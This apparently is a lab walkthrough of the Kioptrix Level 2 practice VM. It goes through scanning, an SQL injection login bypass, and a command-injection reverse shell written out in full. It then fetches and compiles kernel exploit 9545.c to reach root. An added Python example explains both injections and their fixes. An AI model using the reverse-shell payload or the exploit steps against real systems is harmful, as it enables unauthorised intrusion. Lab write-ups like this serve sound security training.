Kioptrix Level 2 Walkthrough
I am writing this Kioptrix Level 2 walkthrough in English as English practice.
The Kioptrix Level 1 walkthrough is the previous post.
Enumeration
arp-scan
Use arp-scan to find the vulnerable VM on the local subnet. My attacker box (eth0) is 192.168.174.132, and the new VMware host that answers, 192.168.174.145, is the Kioptrix Level 2 VM.
$ sudo arp-scan 192.168.174.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:14:46:33, IPv4: 192.168.174.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.174.1    00:50:56:c0:00:08    VMware, Inc.
192.168.174.2    00:50:56:f8:87:2c    VMware, Inc.
192.168.174.145  00:0c:29:d5:8b:05    VMware, Inc.
192.168.174.254  00:50:56:f1:9f:7e    VMware, Inc.
Nmap
First a fast full-port sweep to collect the open ports, then a service and script scan limited to those ports.

$ ipaddr=192.168.174.145
$ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -sC -sV -p$ports $ipaddr
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 09:31 EDT
Nmap scan report for 192.168.174.145
Host is up (0.00049s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            614/udp   status
|_  100024  1            617/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2021-09-16T10:22:15+00:00; -3h09m36s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
617/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

Host script results:
|_clock-skew: -3h09m36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Everything here is from the 2004 to 2009 era: OpenSSH 3.9p1 still offering protocol 1, Apache 2.0.52 on CentOS, a self-signed certificate that expired in 2010 with SSLv2 still enabled, CUPS 1.1 on 631, and MySQL listening on 3306 but refusing unauthorized hosts. The web server on port 80 is the obvious place to start.
Nikto
$ nikto -h $ipaddr
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.174.145
+ Target Hostname:    192.168.174.145
+ Target Port:        80
+ Start Time:         2021-09-16 19:12:01 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2021-09-16 19:12:44 (GMT-4) (43 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The one finding that matters for the attack is the X-Powered-By header: the site runs PHP/4.3.9. The missing security headers, TRACE and the Apache default files are informational only.
Web Access and OWASP ZAP scan
I open the web page on the VM; it presents a login form. I ran OWASP ZAP against it to look for vulnerabilities.
ZAP reported that the login form may be vulnerable to SQL injection. Entering test' OR '1'='1 in the form bypasses the authentication: the single quote closes the quoted string in the login query, and the OR '1'='1' that follows makes the WHERE clause true regardless of the real credentials.
After the bypass, the site shows a page that pings a machine whose address you enter.
This page is vulnerable to OS command injection: the address is passed straight to a shell, so a semicolon terminates the ping command and whatever follows it runs as a second command. I used that to get a reverse shell.
Start a netcat listener on the attacker box first, then submit the string below in the form. It pings my attacker host (192.168.174.132), exports the listener's host and port, and spawns a Python reverse shell that connects back to them.
192.168.174.132;export RHOST="192.168.174.132";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
$ nc -l -p 4242
sh-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00$ whoami
whoami
apache
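To make the two injection points above concrete, here is an added example (my code, not the walkthrough's and not the VM's PHP source, which this page does not show). It assumes the classic shapes these payloads target: a login query built by string concatenation against a users table with username and password columns, and a ping page that glues the address into "ping -c 3 <input>". The users row, the SQLite stand-in for the VM's MySQL, and the column names are constructed for the example. It shows why the SQL payload only works as a tautology in the password field, what /bin/sh actually runs when given the reverse-shell string, and the parameterized query and argv-based ping that close both holes.

```python
"""Added example for the two injection points used above (not code from the
Kioptrix VM or from the walkthrough): a naive login query and a naive ping
command, each beside a fixed version. The exact query shape and the ping
command line are assumptions; the VM's PHP source is not shown on this page.
Runs offline: SQLite stands in for the VM's MySQL."""
import ipaddress
import shlex
import sqlite3

# Payloads exactly as submitted to the VM's two forms.
SQLI_PAYLOAD = "test' OR '1'='1"
REVERSE_SHELL_PAYLOAD = (
    '192.168.174.132;export RHOST="192.168.174.132";export RPORT=4242;'
    "python -c 'import sys,socket,os,pty;s=socket.socket();"
    's.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));'
    '[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\''
)


def _demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table; the attacker does not know this row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return con


def vulnerable_login_sql(username: str, password: str) -> str:
    """Assumed query shape: user input concatenated straight into SQL."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(username: str, password: str) -> bool:
    """AND binds tighter than OR, so the payload is a tautology only when it
    lands in the password field (or both): ... AND password='test' OR '1'='1'.
    In the username field alone it reads OR ('1'='1' AND password=...), false."""
    con = _demo_db()
    try:
        return con.execute(vulnerable_login_sql(username, password)).fetchone() is not None
    finally:
        con.close()


def login_parameterized(username: str, password: str) -> bool:
    """Fixed version: bound parameters, so the payload is just a string to compare."""
    con = _demo_db()
    try:
        row = con.execute(
            "SELECT username FROM users WHERE username=? AND password=?",
            (username, password),
        ).fetchone()
        return row is not None
    finally:
        con.close()


def vulnerable_ping_command(target: str) -> str:
    """Assumed shape of the ping page: the address glued into one shell string."""
    return "ping -c 3 " + target


def shell_commands(cmdline: str) -> list:
    """Split a command line into the separate commands /bin/sh would run.
    Quotes are honoured, so the ';' characters inside the python -c '...'
    argument stay in one token while the unquoted ones start new commands."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(target: str) -> list:
    """Fixed version: accept only a parseable IP address and build an argv list
    for subprocess.run(argv) with no shell, so metacharacters carry no meaning.
    Raises ValueError on anything that is not an address."""
    addr = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "3", str(addr)]


def is_valid_target(target: str) -> bool:
    """True if the hardened ping page would accept this input at all."""
    try:
        safe_ping_argv(target)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("bypass, payload in password field:", login_vulnerable("x", SQLI_PAYLOAD))
    print("same input, parameterized query: ", login_parameterized("x", SQLI_PAYLOAD))
    for cmd in shell_commands(vulnerable_ping_command(REVERSE_SHELL_PAYLOAD)):
        print("shell would run:", cmd)
    print("hardened form accepts payload:", is_valid_target(REVERSE_SHELL_PAYLOAD))
```

Running it shows the ping string splitting into four commands (the ping, two exports and the python reverse shell), which is exactly why a single form field was enough to get a shell as apache. The fix is not to blacklist semicolons but to stop handing user input to a shell at all: validate it as an address and pass an argument list.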
Privilege Escalation
With a local shell as apache, the next step is to collect information about the target: kernel build and distribution release.

sh-3.00$ cat /proc/version
cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
sh-3.00# cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 4.5 (Final)
The kernel is 2.6.9 on CentOS 4.5, 32-bit (i686). Use searchsploit to look for a local privilege escalation exploit.
Of the hits below, 9545.c and 9542.c match this target by their titles (2.4.x/2.6.x on CentOS, and 2.6 < 2.6.19 on CentOS 4.4/4.5). 25444.c requires kernel 2.6.32 or later and 45516.c is x64 only, so neither applies to this i686 2.6.9 kernel. I used 9545.c. Serve it from the attacker box with Python's built-in HTTP server, fetch it on the target with wget, and compile it in place (the VM has gcc).
$ searchsploit linux kernel 2.6. CentOS
--------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                             |  Path
--------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / | linux/local/9545.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/ | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esc | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'M | linux_x86-64/local/45516.c
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ cp /usr/share/exploitdb/exploits/linux/local/9545.c ./
$ python3 -m http.server 80
sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget http://192.168.174.132/9545.c
wget http://192.168.174.132/9545.c
--11:15:40--  http://192.168.174.132/9545.c
           => `9545.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]

100%[====================================>] 9,408         --.--K/s

11:15:40 (1.10 GB/s) - `9545.c' saved [9408/9408]

sh-3.00$ gcc -o privesc 9545.c
gcc -o privesc 9545.c
9545.c:376:28: warning: no newline at end of file
sh-3.00$ ls
ls
9545.c  privesc
sh-3.00$ chmod +x privesc
chmod +x privesc
sh-3.00$ ./privesc
./privesc
sh-3.00# whoami
whoami
root
The exploit drops me into a root shell.